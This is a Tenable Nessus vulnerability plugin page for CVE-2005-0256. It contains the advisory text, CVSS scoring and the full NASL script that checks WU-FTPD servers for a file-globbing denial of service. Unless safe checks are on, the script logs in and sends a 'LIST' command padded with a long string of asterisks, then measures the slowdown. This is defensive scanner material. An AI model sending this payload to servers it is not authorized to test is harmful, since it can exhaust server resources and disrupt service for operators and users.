WU-FTPD wu_fnmatch() Function File Globbing Remote DoS

2005-03-2300:00:00

www.tenable.com

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

EPSS

0.072

Percentile

94.0%

JSON

The version of WU-FTPD running on the remote host exhausts all available resources on the server when it repeatedly receives the following command :

LIST *****[…].

This issue has been confirmed in WU-FTPD 2.6.2 and earlier.

#
# (C) Tenable Network Security, Inc.
#

# References:
# https://labs.idefense.com/verisign/intelligence/2009/vulnerabilities/display.php?id=207
#


include("compat.inc");


if (description)
{
  script_id(17602);
  script_version("1.20");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/08/05");

  script_cve_id("CVE-2005-0256");

  script_name(english:"WU-FTPD wu_fnmatch() Function File Globbing Remote DoS");
  script_summary(english:"Sends 'LIST *****[...]*.*' to the FTP server");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote FTP server has a denial of service vulnerability."
  );
  script_set_attribute(attribute:"description", value:
"The version of WU-FTPD running on the remote host exhausts all
available resources on the server when it repeatedly receives
the following command :

LIST *****[...]*.*

This issue has been confirmed in WU-FTPD 2.6.2 and earlier.");
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?bad5e32a");
  script_set_attribute(
    attribute:"solution", 
    value:"Apply the latest vendor patches."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_cwe_id(119);
  script_set_attribute(attribute:"plugin_publication_date", value:"2005/03/23");
  script_set_attribute(attribute:"vuln_publication_date", value:"2005/02/25");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

   script_category(ACT_DENIAL);
   script_family(english: "FTP");

   script_copyright(english: "Copyright (C) 2005-2020 Tenable Network Security, Inc.");
   script_dependencies("ftpserver_detect_type_nd_version.nasl", "ftp_anonymous.nasl", "smtp_settings.nasl");
   script_require_ports("Services/ftp", 21);
   exit(0);
}

include("audit.inc");
include('global_settings.inc');
include("ftp_func.inc");

port = get_ftp_port(default: 21);

banner = get_ftp_banner(port: port);

if (safe_checks())
{
 if (egrep(string:banner, pattern:" FTP .*Version (wu|wuftpd)-2\.6\.(1|2|2\(1\)) ")) security_hole(port);
 exit(0);
}

# Uncomment next line if there are too many false positive
# if (report_paranoia <= 0 && banner && "wu" >!< banner) exit(0);

if (!banner || ("Version wu-" >!< banner &&
                "Version wuftpd-" >!< banner))
  exit (0);

login = get_kb_item("ftp/login");
password = get_kb_item("ftp/password");

if (supplied_logins_only && (isnull(login) || isnull(password)))
  audit(AUDIT_SUPPLIED_LOGINS_ONLY);

domain = get_kb_item('Settings/third_party_domain');
if (!domain) domain = 'example.com';

if (! login) login = "anonymous";
if (! password) password = "nessus@" + domain;

for (i = 0; i < 2; i ++)
{
 soc = open_sock_tcp(port);
 if (! soc ||
     ! ftp_authenticate(socket:soc, user:login, pass:password))
  exit(0);
 pasv = ftp_pasv(socket: soc);
 if (! pasv) exit(1);
 soc2 = open_sock_tcp(pasv);
 if (! soc2) exit(1);
 # Above 194 *, the server answers "sorry input line too long"
 if (i)
 send(socket: soc, data: 'LIST ***********************************************************************************************************************************************************************************************.*\r\n');
 else
 send(socket: soc, data: 'LIST *.*\r\n');
 t1 = unixtime();
 ftp_recv_line(socket:soc);
 repeat
  data = recv(socket: soc2, length: 1024);
 until (! data);
 t[i] = unixtime() - t1;
 #b = ftp_recv_line(socket:soc);
 close(soc); soc = NULL;
 close(soc2);
}

if (t[0] == 0) t[0] = 1;
if (t[1] > 3 * t[0]) security_hole(port);